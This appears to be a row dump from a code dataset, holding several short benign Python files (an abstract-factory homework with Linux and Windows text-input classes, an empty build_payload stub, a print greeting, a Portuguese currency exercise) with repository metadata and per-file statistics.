return random.randint(1,3) | 17.75 | 30 | 0.732394 | 11 | 71 | 4.727273 | 0.909091 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.033333 | 0.15493 | 71 | 4 | 30 | 17.75 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 6 |
6cb34980b856a1fa798f088cdd922fb0374e1f3c | 890 | py | Python | Part_3_advanced/m15_design_patterns/abstract_factory/homework_1_solution/document_system/text_input.py | Mikma03/InfoShareacademy_Python_Courses | 3df1008c8c92831bebf1625f960f25b39d6987e6 | [
"MIT"
] | null | null | null | Part_3_advanced/m15_design_patterns/abstract_factory/homework_1_solution/document_system/text_input.py | Mikma03/InfoShareacademy_Python_Courses | 3df1008c8c92831bebf1625f960f25b39d6987e6 | [
"MIT"
] | null | null | null | Part_3_advanced/m15_design_patterns/abstract_factory/homework_1_solution/document_system/text_input.py | Mikma03/InfoShareacademy_Python_Courses | 3df1008c8c92831bebf1625f960f25b39d6987e6 | [
"MIT"
] | null | null | null | from typing import Protocol
class Input(Protocol):
def render(self) -> None:
...
def on_key_pressed(self, key: str) -> None:
...
class LinuxInput:
INPUT_SIZE = 10
def __init__(self) -> None:
self.text = ""
def render(self) -> None:
spacing = self.INPUT_SIZE - 2 - len(self.text)
print(self.INPUT_SIZE * "-")
print(f"|{spacing * ' '}|")
print(self.INPUT_SIZE * "-")
def on_key_pressed(self, key: str) -> None:
self.text += key
class WindowsInput:
INPUT_SIZE = 14
def __init__(self) -> None:
self.text = ""
def render(self) -> None:
spacing = self.INPUT_SIZE - 2 - len(self.text)
print(self.INPUT_SIZE * "=")
print(f"[{spacing * ' '}]")
print(self.INPUT_SIZE * "=")
def on_key_pressed(self, key: str) -> None:
self.text += key
| 21.190476 | 54 | 0.546067 | 109 | 890 | 4.256881 | 0.238532 | 0.155172 | 0.168103 | 0.155172 | 0.756466 | 0.756466 | 0.756466 | 0.756466 | 0.693966 | 0.693966 | 0 | 0.009631 | 0.3 | 890 | 41 | 55 | 21.707317 | 0.735152 | 0 | 0 | 0.714286 | 0 | 0 | 0.042697 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.285714 | false | 0 | 0.035714 | 0 | 0.5 | 0.214286 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
9f0162b8862dc57d55701a4d56293eedc2c95a92 | 151 | py | Python | solutions_by_text/utils.py | sijanonly/sbt-python-client | b467d78414e7e01181025cd25456756f46ace237 | [
"MIT"
] | 1 | 2018-10-12T20:20:22.000Z | 2018-10-12T20:20:22.000Z | solutions_by_text/utils.py | sijanonly/sbt-python-client | b467d78414e7e01181025cd25456756f46ace237 | [
"MIT"
] | null | null | null | solutions_by_text/utils.py | sijanonly/sbt-python-client | b467d78414e7e01181025cd25456756f46ace237 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# @Author: sijanonly
# @Date: 2018-03-15 14:14:21
# @Last Modified time: 2018-03-15 17:14:19
def build_payload():
pass
| 16.777778 | 42 | 0.615894 | 25 | 151 | 3.68 | 0.8 | 0.130435 | 0.173913 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.237705 | 0.192053 | 151 | 8 | 43 | 18.875 | 0.516393 | 0.728477 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0.5 | 0 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 6 |
9f5cf3ad9b3e92d21fef53c5a9c52e6ddf81eed2 | 39 | py | Python | Python3xPractice/Test.py | csitedexperts/DataScienceA2Z | 9178c73be8adb6d6b5c142b0f2aa99471e5ca79b | [
"Apache-2.0"
] | 3 | 2019-04-13T04:00:42.000Z | 2020-10-02T01:14:42.000Z | Python3xPractice/Test.py | csitedexperts/DSML_MadeEasy | 9af03a00fb026930c19737790f603a0b0ae40b7e | [
"Apache-2.0"
] | null | null | null | Python3xPractice/Test.py | csitedexperts/DSML_MadeEasy | 9af03a00fb026930c19737790f603a0b0ae40b7e | [
"Apache-2.0"
] | 2 | 2019-03-30T18:55:32.000Z | 2020-05-10T16:30:34.000Z | print ("Welcome to Data Science A2Z")
| 13 | 37 | 0.717949 | 6 | 39 | 4.666667 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.03125 | 0.179487 | 39 | 2 | 38 | 19.5 | 0.84375 | 0 | 0 | 0 | 0 | 0 | 0.710526 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
9f82f70ef74d8aaee077944c7facdb3246b28906 | 401 | py | Python | python_exercises/Curso_em_video/ex108.py | Matheus-IT/lang-python-related | dd2e5d9b9f16d3838ba1670fdfcba1fa3fe305e9 | [
"MIT"
] | null | null | null | python_exercises/Curso_em_video/ex108.py | Matheus-IT/lang-python-related | dd2e5d9b9f16d3838ba1670fdfcba1fa3fe305e9 | [
"MIT"
] | null | null | null | python_exercises/Curso_em_video/ex108.py | Matheus-IT/lang-python-related | dd2e5d9b9f16d3838ba1670fdfcba1fa3fe305e9 | [
"MIT"
] | null | null | null | import moeda
preco = float(input(' - Digite um preco \033[1;32mR$\033[m: '))
print(f' - A metade de {moeda.moeda(preco)} e {moeda.moeda(moeda.metade(preco))}')
print(f' - O dobro de {moeda.moeda(preco)} e {moeda.moeda(moeda.dobro(preco))}')
print(f' - Aumentando 10%, temos {moeda.moeda(moeda.aumentar(preco, 10))}')
print(f' - Diminuindo 13%, temos {moeda.moeda(moeda.diminuir(preco, 13))}')
| 50.125 | 83 | 0.670823 | 63 | 401 | 4.269841 | 0.412698 | 0.371747 | 0.223048 | 0.126394 | 0.245353 | 0.245353 | 0.245353 | 0.245353 | 0 | 0 | 0 | 0.048295 | 0.122195 | 401 | 7 | 84 | 57.285714 | 0.715909 | 0 | 0 | 0 | 0 | 0.333333 | 0.78934 | 0.34264 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.166667 | 0 | 0.166667 | 0.666667 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.